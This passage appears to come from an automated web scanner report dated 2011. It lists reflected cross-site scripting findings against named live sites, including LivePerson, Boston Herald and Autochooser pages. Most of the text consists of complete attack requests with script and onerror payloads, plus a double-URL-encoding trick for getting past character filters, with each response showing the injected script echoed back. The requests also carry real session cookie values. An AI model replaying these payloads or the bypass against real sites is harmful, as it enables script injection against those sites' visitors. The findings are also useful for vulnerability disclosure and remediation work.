Path:	/hc/5296924/cmd/url/

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52300"%3balert(1)//e9d6d4317e4 was submitted in the page parameter. This input was echoed as 52300";alert(1)//e9d6d4317e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us52300"%3balert(1)//e9d6d4317e4&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:17:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 703

<html><body><script language="javascript">function lpRedirectBack() {document.location='/hc/5296924/cmd/url/?site=5296924&page='+escape("http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWan
...[SNIP]...
n:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us52300";alert(1)//e9d6d4317e4")+'&waitForVisitor=redirectBack&redirectAttempts=9&d=1296224260533&nreOnly=false';}setTimeout("lpRedirectBack()",500);</script>
...[SNIP]...

4.204. https://base.liveperson.net/hc/5296924/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd was submitted in the REST URL parameter 2. This input was echoed as bff27"><script>alert(1)</script>8465f0f4edd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /hc/5296924bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; LPit=false; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Master;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:16:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 14:16:53 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...
<form id="survey" name="cb" method="get" action="/hc/5296924/5296924bff27"><script>alert(1)</script>8465f0f4edd/">
...[SNIP]...

4.205. https://base.liveperson.net/hc/5296924/ [lpCallId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The value of the lpCallId request parameter is copied into the HTML document as plain text between tags. The payload d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d was submitted in the lpCallId parameter. This input was echoed as d57f1<img src=a onerror=alert(1)>cca1be53e6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/5296924/?lpCallId=1296223662870-765d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d&lpjson=2&cmd=visitorWantsToChat&isOn=true&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:17:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:17:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 143

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223662870-765d57f1<img src=a onerror=alert(1)>cca1be53e6d","lpCallError":"VISITORNOTFOUND"}});

4.206. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a165</script><script>alert(1)</script>03c6015ae8f was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom4a165</script><script>alert(1)</script>03c6015ae8f&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2148
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom4a165</script><script>alert(1)</script>03c6015ae8f!Top">
...[SNIP]...

4.207. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f614a"><script>alert(1)</script>f5926003640 was submitted in the companion parameter. This input was echoed as f614a\"><script>alert(1)</script>f5926003640 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottomf614a"><script>alert(1)</script>f5926003640&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:22 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2112
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottomf614a\"><script>alert(1)</script>f5926003640!Top">
...[SNIP]...

4.208. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2373%2527%253balert%25281%2529%252f%252f4229a2aac7c was submitted in the page parameter. This input was echoed as c2373';alert(1)//4229a2aac7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomec2373%2527%253balert%25281%2529%252f%252f4229a2aac7c HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2016
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/homec2373';alert(1)//4229a2aac7c@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.209. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c4a"><script>alert(1)</script>4b0e292800b was submitted in the page parameter. This input was echoed as 42c4a\"><script>alert(1)</script>4b0e292800b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome42c4a"><script>alert(1)</script>4b0e292800b HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2112
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home42c4a\"><script>alert(1)</script>4b0e292800b@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.210. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582ab</script><script>alert(1)</script>272b48e55fe was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=Top582ab</script><script>alert(1)</script>272b48e55fe&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:22 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2143
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top582ab</script><script>alert(1)</script>272b48e55fe">
...[SNIP]...

4.211. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57af"><script>alert(1)</script>7c2b6abc9e8 was submitted in the position parameter. This input was echoed as d57af\"><script>alert(1)</script>7c2b6abc9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Topd57af"><script>alert(1)</script>7c2b6abc9e8&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:21 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 2107
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Topd57af\"><script>alert(1)</script>7c2b6abc9e8">
...[SNIP]...

4.212. http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6bfd0%3balert(1)//cb19586ae74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bfd0;alert(1)//cb19586ae74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /results.asp?6bfd0%3balert(1)//cb19586ae74=1 HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:24:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:23:15 GMT
Set-Cookie: cid=4473467; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=KPBLDIICNCEJNNNLADJNNJPH; path=/
Cache-control: private
Content-Length: 56618

<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">

...[SNIP]...

4.213. http://boston30.autochooser.com/results.asp [pagename parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60368'%3balert(1)//0236c25829e was submitted in the pagename parameter. This input was echoed as 60368';alert(1)//0236c25829e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /results.asp?gid=0&pagename=dealersearch.asp60368'%3balert(1)//0236c25829e&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:21:44 GMT
Set-Cookie: cid=4473446; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=FOBLDIICPJKEJBPLDKOCMMDB; path=/
Cache-control: private
Content-Length: 76012

<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">

...[SNIP]...

4.214. http://boston30.autochooser.com/results.asp [postto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The value of the postto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ffc'%3balert(1)//3960f4bf99 was submitted in the postto parameter. This input was echoed as 23ffc';alert(1)//3960f4bf99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp23ffc'%3balert(1)//3960f4bf99 HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:24:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:23:33 GMT
Set-Cookie: cid=4473468; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=LPBLDIICLJKNBKAJIDLGADOK; path=/
Cache-control: private
Content-Length: 75946

<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">

...[SNIP]...

4.215. http://bostonherald.com/news/document.bg [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fee9"%3balert(1)//3539e9e682 was submitted in the f parameter. This input was echoed as 8fee9";alert(1)//3539e9e682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/document.bg?f=misc/100216housing.pdf8fee9"%3balert(1)//3539e9e682&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<script type="text/javascript">

var iframe_container_div = $("iframe_wrapper");
var iframe_pdf_source = "http://multimedia.bostonherald.com/misc/100216housing.pdf8fee9";alert(1)//3539e9e682";

a1 = document.createElement("iframe");
a1.setAttribute("id","document_reader");
a1.setAttribute("src",iframe_pdf_source);
a1.setAttribute("frameborder","0");
a1.setAttribute("scrolling","no")
...[SNIP]...

4.216. http://bostonherald.com/news/document.bg [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload ef2a2<script>alert(1)</script>16a85c5a392 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnershipef2a2<script>alert(1)</script>16a85c5a392&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<h1>Massachusetts Housing Partnershipef2a2<script>alert(1)</script>16a85c5a392</h1>
...[SNIP]...

4.217. http://bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c37a"><script>alert(1)</script>110b65414ac was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Annette+Bening5c37a"><script>alert(1)</script>110b65414ac&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Annette Bening5c37a"><script>alert(1)</script>110b65414ac" name="topic" />
...[SNIP]...

4.218. http://bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e99ef</script><script>alert(1)</script>6ffe388eb75 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?topic=Annette+Beninge99ef</script><script>alert(1)</script>6ffe388eb75&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:22:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
